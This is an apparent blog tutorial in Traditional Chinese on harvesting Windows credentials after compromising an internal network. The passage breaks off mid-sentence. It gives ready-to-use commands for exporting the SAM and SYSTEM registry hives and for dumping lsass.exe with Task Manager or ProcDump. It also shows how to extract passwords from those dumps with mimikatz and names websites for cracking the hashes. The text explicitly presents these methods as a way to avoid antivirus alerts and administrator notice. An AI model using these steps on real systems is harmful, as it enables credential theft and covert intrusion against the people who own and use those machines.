一、通過reg命令匯出登錄檔

1.1為什麼要通過reg命令匯出

　　在我們滲透內網的時候，獲取了WebShell和提權之後，接下來我們就要對密碼進行竊取。如果我們直接新增賬戶或者是上傳mimikatz上去的話，往往會觸發防毒軟體的攔截和安全裝置告警，很容易被管理員發現。那麼我們就需要通過reg命令匯出來，然後放到我們本地的系統對密碼進行竊取。

1.2 reg命令匯出步驟

1、首先需要通過以下兩條命令把登錄檔匯出到系統裡面

reg save hklm\sam sam.hiv
reg save hklm\system sys.hiv

2、把這兩個檔案複製出來，放到mimikatz同一個目錄下，然後使用mimikatz進行竊取。

lsadump::sam /sam:sam.hiv /system:sys.hiv

已經成功竊取到Windows的密碼，在windows 2008之前的密碼是明文的，在2008之後是密文的，所以我們需要把密碼進行解密，解密可以用以下兩個網站。

https://www.objectif-securite.ch/ophcrack.php
https://www.cmd5.com/

二 、利用資源管理器的lsass匯出密碼

1、開啟工作管理員，找到lsass.exe程序。

2、右擊滑鼠，選擇建立儲存檔案。

3、進入那個目錄，把檔案拷貝出來，放到mimikatz目錄下執行以下命令進行竊取。

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

三、ProcDump 竊取密碼憑證

3.1 ProcDump 介紹

　　ProcDump 是一個命令列實用工具，其主要用途是監視應用程式中的 CPU 峰值，並生成在高峰期間故障轉儲，管理員或開發人員可以使用該峰值來確定峰值的原因。 ProcDump 還包括掛起視窗監視 (使用與 Windows 和 工作管理員 使用) 、未經處理異常監視的相同視窗掛起定義，並可以基於系統性能計數器的值生成轉儲。 它還可以充當可嵌入其他指令碼的常規程序轉儲實用工具

3.2 ProcDump 使用

1、使用procdump匯出lsass.dmp檔案

2、使用mimikatz竊取lsass.dmp檔案即可。

3、必須以管理員的CMD來執行，否則會報如下錯誤：